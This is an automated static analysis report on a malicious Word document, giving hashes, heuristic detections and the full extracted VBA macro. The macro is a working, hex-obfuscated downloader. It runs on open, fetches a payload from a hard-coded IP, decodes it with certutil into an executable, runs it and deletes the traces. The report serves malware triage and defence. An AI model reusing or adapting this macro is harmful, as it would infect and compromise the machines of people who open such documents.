Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7f7463a14d72bbe2…

MALICIOUS

Office (OOXML)

157.2 KB Created: 2021-02-22 19:48:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2021-03-01
MD5: ab040efa3a8efca253b7c4b8d5e31abe SHA-1: 13dfd43a25693ea2f22b4b38529635b2134fc48a SHA-256: 7f7463a14d72bbe27d346b0fb33f4be24b0a8248d27987b52ad9541abee8100c
80 Risk Score

Heuristics 6

  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/settings.xml.rels: file:///C:\Program Files\Microsoft Office\Templates\1033\Office Word 2003 Look.dotx
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    xadxcqfbyxj = Environ("appdata")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
    • http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
    • http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
    • http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 8311 bytes
SHA-256: 2a783798690a2c2824f1ca754efde0be6c1ccb65a5eea7814ac70c98c3c1772f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1TemplateProject.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Const yzqgjwsyhx = 2
Const bsrvqrnfck = 1
Const adfhneiepl = 0
#If VBA7 Then
Private Declare PtrSafe Function bpjevjcvethsw Lib "wininet" Alias "InternetOpenA" ( _
ByVal idaijsswnxtjhqrhgl As String, _
ByVal qthcmhydvzotmmpt As Long, _
ByVal nfrelxzrrfoupqg As String, _
ByVal jjsyuwmzvudyezhh As String, _
ByVal vatmmcbopnvyymjxifl As Long) As Long
Private Declare PtrSafe Function ezkltnaikhqoieccrskt Lib "wininet" Alias "InternetConnectA" ( _
ByVal acpoqkvvlqig As Long, _
ByVal rjfkxhle As String, _
ByVal jetolbqa As Integer, _
ByVal vxedspomutdrcairzt As String, _
ByVal rnbrocdkjeqabqwgsa As String, _
ByVal gjhcfbkf As Long, _
ByVal bbbsneseyfc As Long, _
ByVal ytbpfhbbgvnntlqembd As Long) As Long
Private Declare PtrSafe Function wlzgliazapaq Lib "wininet" Alias "HttpOpenRequestA" ( _
ByVal veyhqrewtfirjdbxqfz As Long, _
ByVal ltxligdyngnak As String, _
ByVal enwbteeogn As String, _
ByVal hpagmxihzooydklcia As String, _
ByVal kvczmjtgilanwmxmdk As String, _
ByVal jenimxnug As String, _
ByVal kckbshqbluzd As Long, _
ByVal fkevjlltcmvor As Long) As Long
Private Declare PtrSafe Function piiudzztscfh Lib "wininet" Alias "HttpSendRequestA" ( _
ByVal uhcoqbsh As Long, _
ByVal vxcfvzwerqcnefepj As String, _
ByVal pxvdcknrfsillteeoa As Long, _
ByVal gxfsmrdf As String, _
ByVal vqqjfmsqkmh As Long) As Boolean
Private Declare PtrSafe Function pfpxavmbgn Lib "wininet" Alias "InternetReadFile" ( _
ByVal qzgqlstzhunxkgtflmi As Long, _
ByVal ashduzjapj As String, _
ByVal zdjwphebgxibjpohwtfc As Long, _
ByRef gwzvlfiqqeh As Long) As Boolean
Private Declare PtrSafe Function zbzdbeqjkdiatvnon Lib "Kernel32" Alias "WinExec" ( _
ByVal bnpgjilysxokjjldwbm As String, _
ByVal aahxnbst As Long _
) As Long
Private Declare PtrSafe Function qegdkpnauwthcgu Lib "Kernel32" Alias "Sleep" ( _
ByVal yysftcwo As Long _
) As Long
Private Declare PtrSafe Function ziktndktu Lib "kernel32.dll" Alias "ziktndktuA" (ByVal yfizuliqmoaggyarob As String, ByVal tkcermptyb As String, ByVal wrgfikgc As Long) As Long
#Else
Private Declare Function bpjevjcvethsw Lib "wininet" Alias "InternetOpenA" ( _
ByVal pihunzvjjnvojhblrni As String, _
ByVal cncfcfawrvqtgi As Long, _
ByVal jogmuplkejhtwqfjjjxn As String, _
ByVal eevcrumwpogc As String, _
ByVal zsownhnsso As Long) As Long
Private Declare  Function ezkltnaikhqoieccrskt Lib alsxjfxuikzt("77696e69") & alsxjfxuikzt("6e6574") Alias alsxjfxuikzt("496e7465726e6574436f6e6e65") & alsxjfxuikzt("637441") ( _
ByVal lvmctkgradypq As Long, _
ByVal vuyiihoykrsoqixz As String, _
ByVal duwcwjzkiwqbihzcvxmr As Integer, _
ByVal jzsizkcpfuxtstwp As String, _
ByVal qwgmyzrnvczmn As String, _
ByVal xgcanvgwlkvq As Long, _
ByVal utzzkxmntjn As Long, _
ByVal gcymmmxudi As Long) As Long
Private Declare  Function wlzgliazapaq Lib alsxjfxuikzt("77696e") & alsxjfxuikzt("696e6574") Alias alsxjfxuikzt("487474704f70656e5265") & alsxjfxuikzt("717565737441") ( _
ByVal mtvuwixiinn As Long, _
ByVal tebhwdaaa As String, _
ByVal mqfhuxyuqwyqfdtq As String, _
ByVal ewcpnqdxqvhqdpla As String, _
ByVal zgvfsuai As String, _
ByVal rcptcrvwvknoy As String, _
ByVal dwteyktbfuupmelwsio As Long, _
ByVal qrpbvvnlgpfizphqn As Long) As Long
Private Declare  Function piiudzztscfh Lib alsxjfxuikzt("77696e696e65") & alsxjfxuikzt("74") Alias alsxjfxuikzt("4874747053656e") & alsxjfxuikzt("645265717565737441") ( _
ByVal ddkaxauflbewbdc As Long, _
ByVal ouutwcxv As String, _
ByVal vqhmxxvvpworerg As Long, _
ByVal kpkndlympbwpykhipof As String, _
ByVal nuiriorntlhpnxo As Long) As Boolean
Private Declare  Function pfpxavmbgn Lib alsxjfxuikzt("77696e696e65") & alsxjfxuikzt("74") Alias alsxjfxuikzt("496e7465726e6574526561") & alsxjfxuikzt("6446696c65") ( _
ByVal fhmwfwsqzufrwehh As Long, _
ByVal vkwusgloghmxtwrpwkko As String, _
ByVal ucnvxbwgsnefurgbmy As Long, _
ByRef yfskzfkzomonxehtlosy As Long) As Boolean
Private Declare  Function zbzdbeqjkdiatvnon Lib alsxjfxuikzt("4b65726e") & alsxjfxuikzt("656c3332") Alias alsxjfxuikzt("57696e") & alsxjfxuikzt("45786563") ( _
ByVal mgxltqldcnjujcw As String, _
ByVal cmriteeadp As Long _
) As Long
Private Declare  Function qegdkpnauwthcgu Lib alsxjfxuikzt("4b65726e656c") & alsxjfxuikzt("3332") Alias alsxjfxuikzt("53") & alsxjfxuikzt("6c656570") ( _
ByVal yysftcwo As Long _
) As Long
Private Declare Function ziktndktu Lib "kernel32.dll" Alias "ziktndktuA" (ByVal yfizuliqmoaggyarob As String, ByVal tkcermptyb As String, ByVal wrgfikgc As Long) As Long
#End If
Function rString()
Dim sxnyobkrdgojagviluev As Variant
Dim poqnpzddklsuoppbs As Long
Dim txwmuhwfanuildhkgjz As String
sxnyobkrdgojagviluev = Array(alsxjfxuikzt("61"), alsxjfxuikzt("62"), alsxjfxuikzt("72"), alsxjfxuikzt("66"), alsxjfxuikzt("78"), alsxjfxuikzt("61"), alsxjfxuikzt("71"), alsxjfxuikzt("6c"), alsxjfxuikzt("32"), alsxjfxuikzt("6a"))
For poqnpzddklsuoppbs = 1 To 7
Randomize
txwmuhwfanuildhkgjz = txwmuhwfanuildhkgjz & sxnyobkrdgojagviluev(Int((UBound(sxnyobkrdgojagviluev) - LBound(sxnyobkrdgojagviluev) + 1) * Rnd + LBound(sxnyobkrdgojagviluev)))
Next poqnpzddklsuoppbs
rString = txwmuhwfanuildhkgjz & alsxjfxuikzt("76")
End Function
Sub AutoOpen()
Dim rkxflbupqfffvw As String
Dim jdtmmspdelyp As String
rkxflbupqfffvw = alsxjfxuikzt("3139352e31") & alsxjfxuikzt("32332e3232302e313238")
jdtmmspdelyp = alsxjfxuikzt("2f632e63") & alsxjfxuikzt("7274")
Dim ausxqytaekelkyhtj As String
Dim xuhssmwjpmpl As String
Dim jomzwopoporss As String
Dim xadxcqfbyxj As String
Dim dhtzamhahe As Long
dhtzamhahe = bpjevjcvethsw(alsxjfxuikzt("4d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533382e3320284b48544d4c2c206c696b65204765636b") & alsxjfxuikzt("6f29204368726f6d652f38382e302e343332342e3131205361666172692f3533372e32"), adfhneiepl, vbNullString, vbNullString, adfhneiepl)
If dhtzamhahe = 0 Then
GoTo SingleExit
End If
Dim fcvplukcfvhf As Long
fcvplukcfvhf = ezkltnaikhqoieccrskt(dhtzamhahe, rkxflbupqfffvw, 80, adfhneiepl, 0, 3, adfhneiepl, adfhneiepl)
If fcvplukcfvhf = 0 Then
GoTo SingleExit
End If
Dim xtogiqqgp As Long
Dim lazpxljatcy As Long
lazpxljatcy = wlzgliazapaq(fcvplukcfvhf, alsxjfxuikzt("474554"), jdtmmspdelyp, alsxjfxuikzt("4854") & alsxjfxuikzt("54502f312e30"), vbNullString, vbNullString, &H4000000 Or &H80000, adfhneiepl)
Dim elrslzplzrufd As Boolean
elrslzplzrufd = piiudzztscfh(lazpxljatcy, vbNullString, adfhneiepl, vbNullString, adfhneiepl)
xadxcqfbyxj = Environ("appdata")
ausxqytaekelkyhtj = xadxcqfbyxj & alsxjfxuikzt("5c") & rString
jomzwopoporss = xadxcqfbyxj & alsxjfxuikzt("5c") & rString & alsxjfxuikzt("2e6578") & alsxjfxuikzt("6520")
xuhssmwjpmpl = xadxcqfbyxj & alsxjfxuikzt("5c") & rString & alsxjfxuikzt("2e") & alsxjfxuikzt("65786520")
Dim cmovoieiizt As String * 1
Dim eesnjksirt As Long
eesnjksirt = FreeFile()
Open ausxqytaekelkyhtj For Binary Access Write As eesnjksirt
Do
Dim mhxshbkdsiyzkwx As Long
elrslzplzrufd = pfpxavmbgn(lazpxljatcy, cmovoieiizt, Len(cmovoieiizt), mhxshbkdsiyzkwx)
If mhxshbkdsiyzkwx > 0 Then
Put eesnjksirt, , cmovoieiizt
End If
Loop While mhxshbkdsiyzkwx > 0
Close eesnjksirt
FileCopy alsxjfxuikzt("5c57696e646f77735c53797374656d33325c6365727475") & alsxjfxuikzt("74696c2e657865"), xuhssmwjpmpl
Dim eeotlfagqtxzvqgykj As String
eeotlfagqtxzvqgykj = Chr(34) & xuhssmwjpmpl & Chr(34) & alsxjfxuikzt("202d") & alsxjfxuikzt("6465636f646520") & Chr(34) & ausxqytaekelkyhtj & Chr(34) & alsxjfxuikzt("20") & Chr(34) & jomzwopoporss & Chr(34)
zbzdbeqjkdiatvnon eeotlfagqtxzvqgykj, 0
qegdkpnauwthcgu 1332
zbzdbeqjkdiatvnon jomzwopoporss, 0
Kill xuhssmwjpmpl
Kill ausxqytaekelkyhtj
SingleExit:
End Sub
Private Function alsxjfxuikzt(ByVal vutimzvgujum As String) As String
Dim zwigapbvalop As Long
For zwigapbvalop = 1 To Len(vutimzvgujum) Step 2
alsxjfxuikzt = alsxjfxuikzt & Chr$(Val("&H" & Mid$(vutimzvgujum, zwigapbvalop, 2)))
Next zwigapbvalop
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 41472 bytes
SHA-256: 52387690d9d046dc68714a251e7cbbab2723d8d136a48943e7cf0254ddd5f5b0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).